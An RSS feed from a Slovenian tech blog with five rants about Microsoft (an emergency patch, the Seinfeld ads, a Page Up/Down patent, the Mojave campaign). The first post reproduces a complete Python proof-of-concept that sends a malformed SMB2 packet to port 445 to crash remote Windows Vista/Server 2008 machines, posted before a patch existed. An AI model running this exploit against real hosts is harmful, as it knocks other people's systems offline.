<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Another day in a geek's life &#187; microsoft</title>
	<atom:link href="http://www.mulaz.org/blog/tag/microsoft/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.mulaz.org/blog</link>
	<description>question = 2b &#124;&#124; !2b;</description>
	<lastBuildDate>Tue, 10 Jan 2012 14:12:50 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Windows 7, security, Linux, patchi, in en 0-day</title>
		<link>http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/</link>
		<comments>http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/#comments</comments>
		<pubDate>Tue, 08 Sep 2009 17:45:06 +0000</pubDate>
		<dc:creator>mulaz</dc:creator>
				<category><![CDATA[geek stuff]]></category>
		<category><![CDATA[rant]]></category>
		<category><![CDATA[0-day]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[python]]></category>

		<guid isPermaLink="false">http://www.mulaz.org/blog/?p=690</guid>
		<description><![CDATA[Pred par dnevi je na slashdotu pojavil topic1  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 "ql", in kok je Linux "beden".  Konkreten slajd, ki mi je privlekel pozornost je bil tudi: Torej... ko pride do kakega grdega b00ga, exploita ipd, so userji "on their own", če uporabljajo Microsoft priozvode, so [...]]]></description>
			<content:encoded><![CDATA[<p>Pred par dnevi je na slashdotu pojavil <a href="http://linux.slashdot.org/story/09/09/05/195219/Microsoft-Attacks-Linux-With-Retail-Training-Talking-Points">topic</a><sup class='footnote'><a href='#fn-690-1' id='fnref-690-1'>1</a></sup>  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 "ql", in kok je Linux "beden".  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:</p>
<p><a href="http://www.mulaz.org/blog/wp-content/uploads/2009/09/Linux11.jpg"><img class="alignnone size-medium wp-image-691" title="Linux11 security" src="http://www.mulaz.org/blog/wp-content/uploads/2009/09/Linux11-300x175.jpg" alt="Linux11 security" width="300" height="175" /></a></p>
<p>Torej... ko pride do kakega grdega b00ga, exploita ipd, so userji "on their own", če uporabljajo Microsoft priozvode, so pa "safe and secure"...</p>
<p>No in danes mi je @<a href="mailto:k@jst.sm">Kostko</a> poslal zanimiv link (<a href="http://seclists.org/fulldisclosure/2009/Sep/0039.html" target="_blank">click here</a>), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z 'zagarantirano varnostjo'? Citiram:</p>
<blockquote><p>Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.</p></blockquote>
<p>Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:</p>

<div class="wp_syntax"><div class="code"><pre class="python" style="font-family:monospace;"><span style="color: #808080; font-style: italic;">#!/usr/bin/python</span>
<span style="color: #808080; font-style: italic;"># When SMB2.0 recieve a &quot;&amp;amp;&quot; char in the &quot;Process Id High&quot; SMB header field it dies with a</span>
<span style="color: #808080; font-style: italic;"># PAGE_FAULT_IN_NONPAGED_AREA from socket import socket</span>
<span style="color: #ff7700;font-weight:bold;">from</span> <span style="color: #dc143c;">time</span> <span style="color: #ff7700;font-weight:bold;">import</span> sleep
&nbsp;
host = <span style="color: #483d8b;">&quot;IP_ADDR&quot;</span>, <span style="color: #ff4500;">445</span>
buff = <span style="color: black;">&#40;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>90&quot;</span> <span style="color: #808080; font-style: italic;"># Begin SMB header: Session message</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>42&quot;</span> <span style="color: #808080; font-style: italic;"># Server Component: SMB</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span> <span style="color: #808080; font-style: italic;"># Negociate Protocol</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>18<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>c8&quot;</span> <span style="color: #808080; font-style: italic;"># Operation 0x18 &amp;amp; sub 0xc853</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>26&quot;</span><span style="color: #808080; font-style: italic;"># Process ID High: --&amp;gt; :) normal value should be &quot;\x00\x00&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>ff<span style="color: #000099; font-weight: bold;">\x</span>fe&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>6d<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>43<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>45<span style="color: #000099; font-weight: bold;">\x</span>54&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>57<span style="color: #000099; font-weight: bold;">\x</span>4f<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>4b<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>50<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>4f<span style="color: #000099; font-weight: bold;">\x</span>47<span style="color: #000099; font-weight: bold;">\x</span>52<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>31&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>4c<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>57<span style="color: #000099; font-weight: bold;">\x</span>69<span style="color: #000099; font-weight: bold;">\x</span>6e<span style="color: #000099; font-weight: bold;">\x</span>64<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>77<span style="color: #000099; font-weight: bold;">\x</span>73<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>66<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>57&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>6b<span style="color: #000099; font-weight: bold;">\x</span>67<span style="color: #000099; font-weight: bold;">\x</span>72<span style="color: #000099; font-weight: bold;">\x</span>6f<span style="color: #000099; font-weight: bold;">\x</span>75<span style="color: #000099; font-weight: bold;">\x</span>70<span style="color: #000099; font-weight: bold;">\x</span>73<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>33<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>61&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>4c<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>58<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>4c&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>41<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>4e<span style="color: #000099; font-weight: bold;">\x</span>54<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>4c&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>2e<span style="color: #000099; font-weight: bold;">\x</span>31<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>00<span style="color: #000099; font-weight: bold;">\x</span>02<span style="color: #000099; font-weight: bold;">\x</span>53<span style="color: #000099; font-weight: bold;">\x</span>4d<span style="color: #000099; font-weight: bold;">\x</span>42<span style="color: #000099; font-weight: bold;">\x</span>20<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>2e&quot;</span>
<span style="color: #483d8b;">&quot;<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>30<span style="color: #000099; font-weight: bold;">\x</span>32<span style="color: #000099; font-weight: bold;">\x</span>00&quot;</span>
&nbsp;
<span style="color: black;">&#41;</span>
s = <span style="color: #dc143c;">socket</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span>
&nbsp;
s.<span style="color: black;">connect</span><span style="color: black;">&#40;</span>host<span style="color: black;">&#41;</span>
s.<span style="color: black;">send</span><span style="color: black;">&#40;</span>buff<span style="color: black;">&#41;</span>
s.<span style="color: black;">close</span><span style="color: black;">&#40;</span><span style="color: black;">&#41;</span></pre></div></div>

<p>ps:  zadeva se je pojavila tudi na slashdotu (<a href="http://it.slashdot.org/story/09/09/08/1345247/Windows-7-Reintroduces-Remote-BSoD">click here</a>)</p>
<p>pps:</p>
<blockquote><p>(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti<br />
(21:19:12) Anze: win7 je safe <--????<br />
(21:19:16) Anze: win 2k8 pade</p></blockquote>
<div class='footnotes'>
<div class='footnotedivider'></div>
<ol>
<li id='fn-690-1'>zaradi photobucketa se slik več ne vidi, zato sem postavil mirror <a href="http://www.mulaz.org/spam/2009/09/06/microsoft-attacks-linux-with-retail-training-talking-points-image-mirror/" target="_blank">tule</a> <span class='footnotereverse'><a href='#fnref-690-1'>&#8617;</a></span></li>
</ol>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft releases emergency patch for 0day exploits</title>
		<link>http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/</link>
		<comments>http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/#comments</comments>
		<pubDate>Mon, 27 Oct 2008 13:13:28 +0000</pubDate>
		<dc:creator>mulaz</dc:creator>
				<category><![CDATA[geek stuff]]></category>
		<category><![CDATA[Ostalo]]></category>
		<category><![CDATA[rant]]></category>
		<category><![CDATA[0day]]></category>
		<category><![CDATA[exploit]]></category>
		<category><![CDATA[lol]]></category>
		<category><![CDATA[microsoft]]></category>

		<guid isPermaLink="false">http://www.mulaz.org/blog/?p=345</guid>
		<description><![CDATA[Očitno je M$ spet naredil sranje... remote code execution zakon Me prov zanima kje use se že nahajajo exploiti LINK]]></description>
			<content:encoded><![CDATA[<p>Očitno je M$ spet naredil sranje... remote code execution <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  zakon <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>Me prov zanima kje use se že nahajajo exploiti <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p><a href="http://arstechnica.com/journals/microsoft.ars/2008/10/24/microsoft-releases-emergency-patch-for-0day-exploits" target="_blank">LINK</a></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Nič več Microsoft-Seinfield reklam</title>
		<link>http://www.mulaz.org/blog/2008/09/18/nic-vec-microsoft-seinfield-reklam/</link>
		<comments>http://www.mulaz.org/blog/2008/09/18/nic-vec-microsoft-seinfield-reklam/#comments</comments>
		<pubDate>Thu, 18 Sep 2008 10:47:05 +0000</pubDate>
		<dc:creator>mulaz</dc:creator>
				<category><![CDATA[Ostalo]]></category>
		<category><![CDATA[lol]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[seinfield]]></category>

		<guid isPermaLink="false">http://www.mulaz.org/blog/?p=249</guid>
		<description><![CDATA[Se spomnite Microsoftovih reklam s Seinfieldom? (prva in druga)? Sodeč po tej strani je Microsoft plačal Seinfieldu 10.000.000$ (jap.. 10 milijonov)... Če ste si ogledali reklame, se najbrž čudite. Očitno so si tudi v Microsoftu premislili. Sodeč po tem linku bodo pa zdaj prenehali sodelovanje s Seinfieldom. In najbolj zanimiva izjava? "Redmond had always planned [...]]]></description>
			<content:encoded><![CDATA[<p>Se spomnite Microsoftovih reklam s Seinfieldom? (<a href="http://www.youtube.com/watch?v=rIjNJZpRtj8" target="_blank">prva</a> in <a href="http://www.youtube.com/watch?v=gBWPf1BWtkw" target="_blank">druga</a>)? Sodeč po <a href="http://blogs.moneycentral.msn.com/topstocks/archive/2008/09/05/gates-and-seinfeld-make-ad-debut.aspx" target="_blank">tej strani</a> je Microsoft plačal Seinfieldu 10.000.000$ (jap.. 10 milijonov)... Če ste si ogledali reklame, se najbrž čudite. Očitno so si tudi v Microsoftu premislili.</p>
<p>Sodeč po <a href="http://valleywag.com/5051455/microsoft-to-announce-jerry-seinfeld-ads-cancelled-tomorrow" target="_blank">tem linku</a> bodo pa zdaj prenehali sodelovanje s Seinfieldom. In najbolj zanimiva izjava? "<em>Redmond had always planned to drop Seinfeld.</em>" Vprašanje je le, a to že pred podpisom 10M usd vredne pogodbe, ali kmalu za tem? No ja... očitno majo res preveč denarja <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://www.mulaz.org/blog/2008/09/18/nic-vec-microsoft-seinfield-reklam/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>US Patent 7415666 - Method and system for navigating paginated content in page-based increments</title>
		<link>http://www.mulaz.org/blog/2008/08/26/us-patent-7415666-method-and-system-for-navigating-paginated-content-in-page-based-increments/</link>
		<comments>http://www.mulaz.org/blog/2008/08/26/us-patent-7415666-method-and-system-for-navigating-paginated-content-in-page-based-increments/#comments</comments>
		<pubDate>Tue, 26 Aug 2008 17:50:11 +0000</pubDate>
		<dc:creator>mulaz</dc:creator>
				<category><![CDATA[rant]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[patent]]></category>

		<guid isPermaLink="false">http://mulaz.org/blog/?p=164</guid>
		<description><![CDATA[Gdo ne razume imena patenta? Naj samo omenim da je to Micro$oftov patent… pa gremo: Poglejmo izvleček: A method and system in a document viewer for scrolling a substantially exact increment in a document, such as one page, regardless of whether the zoom is such that some, all or one page is currently being viewed. [...]]]></description>
			<content:encoded><![CDATA[<p>Gdo ne razume imena patenta? Naj samo omenim da je to Micro$oftov patent… pa gremo:</p>
<p>Poglejmo izvleček:</p>
<p style="padding-left: 30px;">A method and system in a document viewer for scrolling a substantially exact increment in a document, such as one page, regardless of whether the zoom is such that some, all or one page is currently being viewed. In one implementation, pressing a Page Down or Page Up keyboard key/button allows a user to begin at any starting vertical location within a page, and navigate to that same location on the next or previous page. For example, if a user is viewing a page starting in a viewing area from the middle of that page and ending at the bottom, a Page Down command will cause the next page to be shown in the viewing area starting at the middle of the next page and ending at the bottom of the next page. Similar behavior occurs when there is more than one column of pages being displayed in a row.</p>
<p>Vir: <a href="http://www.patentstorm.us/patents/7415666/fulltext.html" target="_blank">www.patentstorm.us</a></p>
<p>Hmm.. se že bolj razume? Ene par besed umes je jasnih… in ja… Microsoftu je dejansko uspelo patentirati “Page up” in “Page down”. Kar je (po mojem mišljenju) precej zanimivo, še posebej ker sta ti dve tipki obstajali še dosti pred tem, ko se je Microsoft začel ukvarjati s čimerkoli podobnim (baje(!) že na IBM-ovem S/34).</p>
<p>In kako jim je to ratal? Po ameriško seveda. Uzameš nekaj, kar je že splošno znano, in dodaš čudno ime (”metoda in sistem”), zakompliciraš opis, in imaš za sabo eno izmed največjih pravniških ekip v ameriki (in najbrž tudi na svetu). Seveda, če imaš slednje, se podrazumeva da imaš tudi dovolj denarja in dovolj moči v državi in na tržišču.</p>
<p>In zakaj je to problem? Predvsem zato, ker tako delovanje (pomik za eno stran gor-dol) uporablja mnogo ne-Microsoftovih aplikacij. S tem patentom Microsoft (če dokaže da neka aplikacija uporablja Microsoftov patent) lahko uloži tožbo proti podjetjem/programerjem/… Ker pa je večina podjetij, precej manjših od Microsofta, in ker na***ejo še posebej pisci odprtokodnih programov, ki ponavadi sploh nimajo nikogar za sabo, tak patent lahko povzroči totalni kaos. Me pa zanima (pravniki pomoč!), kako je z aplikacijami, ki so to ‘tehnologijo’ uporabljale še pred microsoftovim patentom? Oz tudi celo pred Microsoftovo implementacijo page up/down v katerikoli microsoftov program?</p>
<p>Sicer nevem čigava ideja je bila narediti page-up in page-down, bi blo pa zanimivo če bi to bil IBM. Se še kdo spomni IBM vs. SCO? <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> )</p>
<p>Link: <a href="http://www.itwire.com/content/view/20193/53/" target="_blank">še en članek na to temo</a></p>
<p><small>ps: se opravičujem ker je ta post nastal še enkrat, imel sem manjši problem z bazo<br />
pps: Jure, tudi tvoj comment je žal izginil zaradi baze, napisal si da se morajo upoštevati vsi claimi tam napisani (in tudi formule). Tiste formule so samo najbolj enostavne formule za izračun pozicije na strani. Vse ostalo se nanaša na to, da če se premakne za en 'ekran' dol, je ok, če se premakne za eno 'stran' (torej celo stran, ne glede na to kolikor jo je vidne na ekranu), pa ni več "ok". Tudi v nekaterih odprtokodnih aplikacijah se pageup/down tako obnasa. </small></p>
]]></content:encoded>
			<wfw:commentRss>http://www.mulaz.org/blog/2008/08/26/us-patent-7415666-method-and-system-for-navigating-paginated-content-in-page-based-increments/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Se eno zanimivo Microsoftovo dejanje</title>
		<link>http://www.mulaz.org/blog/2008/08/04/se-eno-zanimivo-microsoftovo-dejanje/</link>
		<comments>http://www.mulaz.org/blog/2008/08/04/se-eno-zanimivo-microsoftovo-dejanje/#comments</comments>
		<pubDate>Mon, 04 Aug 2008 01:33:25 +0000</pubDate>
		<dc:creator>mulaz</dc:creator>
				<category><![CDATA[Ostalo]]></category>
		<category><![CDATA[rant]]></category>
		<category><![CDATA[lame]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[vista]]></category>
		<category><![CDATA[windows]]></category>

		<guid isPermaLink="false">http://mulaz.org/blog/?p=108</guid>
		<description><![CDATA[Cesa tok lame osebno se nism vidu. Reklama za tweezy je bolj avtenticna od tega. http://www.mojaveexperiment.com/ Najolj zanimivo mi je blo, da so mogl pisat ocene za sistem, ki ga niti niso vidl, niti ne uporabljal. In potem prva zenska napise uno velko nulo (ceprov naj bi to bla kao skrita kamera? al kaj naj [...]]]></description>
			<content:encoded><![CDATA[<p>Cesa tok lame osebno se nism vidu. Reklama za tweezy je bolj avtenticna od tega.</p>
<p><a href="http://www.mojaveexperiment.com/">http://www.mojaveexperiment.com/</a></p>
<p>Najolj zanimivo mi je blo, da so mogl pisat ocene za sistem, ki ga niti niso vidl, niti ne uporabljal. In potem prva zenska napise uno velko nulo (ceprov naj bi to bla kao skrita kamera? al kaj naj bi blo? niti sam nism razumeu unih kadrov iz enga vogala posnetih k zgleda k da je skrito.). In potem k vid, cisto desetko  na velko cez ceu list spet. Pa tud, zakaj pise na prazn list tok na velko ce naj bi bla skrita kamera? ce pa naj nebi bla pa spet... zakaj snemano iz kota. Potem pa se una izjava 'i like this security feature'.. wtf? covek ki ni vidu usaj screenshota vista prepozna 'secrity feature' in se rece da mu je usec? pa potem se una 'i like gadgets'? A ni gadget v tem pomenu izmisljotina microsofta, da bi kontriral 'widgetu'?<br />
potem.. ce kliknes 'you cant please everyone'... kako clovk ki ni uporablu viste in kao ne ve kako zgleda  (ker kao ni prepoznau) lahko rece 'why is it faster?' ce nima s cem primerjat</p>
<p>edina stvar ki mi je bla na tej strani ql je flash efekt pri izbiranju videov <img src='http://www.mulaz.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>se opravicujem, sam mogu sm skurcat... cesa bolj lame se nism vidu.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.mulaz.org/blog/2008/08/04/se-eno-zanimivo-microsoftovo-dejanje/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
	</channel>
</rss>

